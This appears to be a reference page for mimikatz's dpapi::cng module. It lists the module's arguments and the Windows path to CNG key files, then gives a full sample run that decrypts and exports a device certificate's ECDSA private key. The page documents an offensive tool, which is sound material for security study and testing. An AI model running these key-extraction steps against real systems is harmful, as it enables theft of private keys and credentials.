cng
dpapi::cng decrypts a given CNG private key file. According to this document, the Crypto Next Generation (CNG) API is a successor of of Crypto API (CAPI). It has the following command line argument:
  • /in: the CNG private key file. The location of the file is C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\Keys\<key_file>
  • /password: the password to decrypt the cng
  • /masterkey: the masterkey to use for decryption. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decryption results on screen
1
mimikatz # dpapi::cng /in:"C:\Users\m3g9tr0n\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_e4aad2d1-5ec0-4ea4-b259-65eda5bc47a8" /unprotect
2
**KEY (cng)**
3
dwVersion : 00000001 - 1
4
unk : 00000000 - 0
5
dwNameLen : 0000006e - 110
6
type : 00030004 - 196612
7
dwPublicPropertiesLen : 00000088 - 136
8
dwPrivatePropertiesLen: 000000ee - 238
9
dwPrivateKeyLen : 00000110 - 272
10
unkArray[16] : 00000000000000000000000000000000
11
pName : Microsoft Connected Devices Platform device certificate
12
pPublicProperties : 2 field(s)
13
**KEY CNG PROPERTY**
14
dwStructLen : 0000002c - 44
15
type : 00000000 - 0
16
unk : 00000000 - 0
17
dwNameLen : 00000010 - 16
18
dwPropertyLen : 00000008 - 8
19
pName : Modified
20
pProperty : 2136f8f327d6d701
21
​
22
**KEY CNG PROPERTY**
23
dwStructLen : 0000005c - 92
24
type : 0000000a - 10
25
unk : 00000000 - 0
26
dwNameLen : 00000000 - 0
27
dwPropertyLen : 00000048 - 72
28
pName :
29
pProperty : 45435331200000005266cba2681ed70a0576a7f8b430eb41d1c44c4891a841726808ffa0ee887a7c8f4a06ad0916f7503124549834a58a0d7e6a22fbeab527bcd527fbc1c519f9d8
30
​
31
pPrivateProperties :
32
**BLOB**
33
dwVersion : 00000001 - 1
34
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
35
dwMasterKeyVersion : 00000001 - 1
36
guidMasterKey : {5c22983f-77ee-41e4-9086-8073d664e417}
37
dwFlags : 00000000 - 0 ()
38
dwDescriptionLen : 0000002e - 46
39
szDescription : Private Key Properties
40
algCrypt : 00006603 - 26115 (CALG_3DES)
41
dwAlgCryptLen : 000000c0 - 192
42
dwSaltLen : 00000010 - 16
43
pbSalt : f23b7f559bbce2b8642cc8ceb007b45d
44
dwHmacKeyLen : 00000000 - 0
45
pbHmackKey :
46
algHash : 00008004 - 32772 (CALG_SHA1)
47
dwAlgHashLen : 000000a0 - 160
48
dwHmac2KeyLen : 00000010 - 16
49
pbHmack2Key : f06062572b447d30ce57f94d8484611f
50
dwDataLen : 00000038 - 56
51
pbData : 9ab857893f8135b87f16edbc7a885a95a58b2bd19c39ad891e463d8dffefee783d680b28d2fe37e8092515baea2ca1f5bc442095012d576d
52
dwSignLen : 00000014 - 20
53
pbSign : e93adcb7cc8f659b57ccf09ed8fe51d701d6f93d
54
​
55
pPrivateKey :
56
**BLOB**
57
dwVersion : 00000001 - 1
58
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
59
dwMasterKeyVersion : 00000001 - 1
60
guidMasterKey : {5c22983f-77ee-41e4-9086-8073d664e417}
61
dwFlags : 00000000 - 0 ()
62
dwDescriptionLen : 00000018 - 24
63
szDescription : Private Key
64
algCrypt : 00006603 - 26115 (CALG_3DES)
65
dwAlgCryptLen : 000000c0 - 192
66
dwSaltLen : 00000010 - 16
67
pbSalt : 858b2f4b4b0ae21d72fcc27513bfaead
68
dwHmacKeyLen : 00000000 - 0
69
pbHmackKey :
70
algHash : 00008004 - 32772 (CALG_SHA1)
71
dwAlgHashLen : 000000a0 - 160
72
dwHmac2KeyLen : 00000010 - 16
73
pbHmack2Key : 52f468f480fc4d7e6c655d9c233103d7
74
dwDataLen : 00000070 - 112
75
pbData : f4f111a0db7097371c5a05f4fd1648bf1682e2e99d7cd7d67ab2e88ab85875073d9fec779dbefba2d0f0e3d4b60f3fd53bb7c228ea7aa087a1b54e773e2e05d5982c5e8bfb4251298011c3fc19da1a0e721c9a6fbff58e1c7a74a387f0fd4bdafd856b9563bc1070cbdf714eb78d7139
76
dwSignLen : 00000014 - 20
77
pbSign : a4864f3ddaccc3f165eab44371d06584950b9fa5
78
​
79
Decrypting Private Properties:
80
* using CryptUnprotectData API
81
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
82
1 field(s)
83
**KEY CNG PROPERTY**
84
dwStructLen : 00000032 - 50
85
type : 00000003 - 3
86
unk : 00000000 - 0
87
dwNameLen : 0000001a - 26
88
dwPropertyLen : 00000004 - 4
89
pName : Export Policy
90
pProperty : 03000000
91
​
92
Decrypting Private Key:
93
* using CryptUnprotectData API
94
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
95
45435332200000005266cba2681ed70a0576a7f8b430eb41d1c44c4891a841726808ffa0ee887a7c8f4a06ad0916f7503124549834a58a0d7e6a22fbeab527bcd527fbc1c519f9d8a6a296d94241edf1446e255551f0d9198474bd99aab67996a9a0bfc93357337d
96
|Provider name : Microsoft Software Key Storage Provider
97
|Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ;
98
Algorithm : ECDSA_P256
99
Key size : 256 (0x00000100)
100
Export policy : 00000003 ( NCRYPT_ALLOW_EXPORT_FLAG ; NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ; )
101
Exportable key : YES
102
LSA isolation : NO
103
Private export : OK - 'dpapi_cng_0_Microsoft Connected Devices Platform device certificate.dsa.ec.p8k'
Copied!
Copy link